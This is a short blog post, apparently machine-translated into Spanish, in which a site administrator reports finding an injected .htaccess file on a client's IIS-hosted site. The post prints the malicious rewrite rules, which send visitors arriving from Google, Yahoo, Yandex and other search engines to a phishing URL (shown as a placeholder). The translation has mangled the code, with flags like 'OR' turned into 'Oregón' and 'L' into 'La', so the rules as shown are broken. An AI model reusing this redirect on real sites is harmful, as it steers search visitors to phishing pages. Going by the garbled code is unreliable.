Jueves, 22 de enero, 2009 | Autor:

Yo hace poco encontré un problema con el sitio web de un cliente debido a un .htaccess expediente. El sitio estaba alojado en un Ventanas servidor en funcionamiento IIS uso IISPassword, que hace uso de .htaccess archivos para sus ajustes.

IISPassword no sigue exactamente las mismas reglas que con Apache sin embargo. Si el archivo htaccess. Existe entonces necesario contener normas IISPassword apropiados, de lo contrario el servidor sólo devuelve el siguiente error:

Error 500 given by IIS Password
Aquí está el contenido del archivo htaccess.. Yo sólo he modificado la URL final redirección señalar adecuadamente a example.com:

RewriteEngine En
RewriteCond %{HTTP_REFERER} .*google. * $ [NC,Oregón]
RewriteCond %{HTTP_REFERER} .*aol. * $ [NC,Oregón]
RewriteCond %{HTTP_REFERER} .*msn. * $ [NC,Oregón]
RewriteCond %{HTTP_REFERER} .*yahoo. * $ [NC,Oregón]
RewriteCond %{HTTP_REFERER} .*yandex. * $ [NC,Oregón]
RewriteCond %{HTTP_REFERER} .*rambler. * $ [NC,Oregón]
RewriteCond %{HTTP_REFERER} .*ya.*$ [NC]
RewriteRule .* http://siffy-phishing-url.example.com [R,La]

Si este eran en un servidor con Apache con mod_rewrite, la mayoría de los usuarios de Internet irían directamente al contenido del sitio correcto. Sólo si llegaron al sitio a través de los motores de búsqueda y los índices que figuran en el archivo. Htaccess, iban a ser redirigido a la URL de phishing siffy que el cracker quiere víctimas para llegar a.

Por supuesto, el cracker (o tal vez incluso un gusano automatizado) no se dio cuenta de que el servidor en cuestión ni siquiera admite estas reglas mod_rewrite. Pero de cualquier manera, esto es muy preocupante, ya que puedo prever muchas discusiones acerca de si el sitio es laboral

Compartir
Categoría: alojamiento, azar
Puedes seguir cualquier respuesta a esta entrada a través de la RSS 2.0 pienso. Usted puede dejar un comentario, o trackback desde tu propio sitio.
Deja un comentario » Iniciar la sesión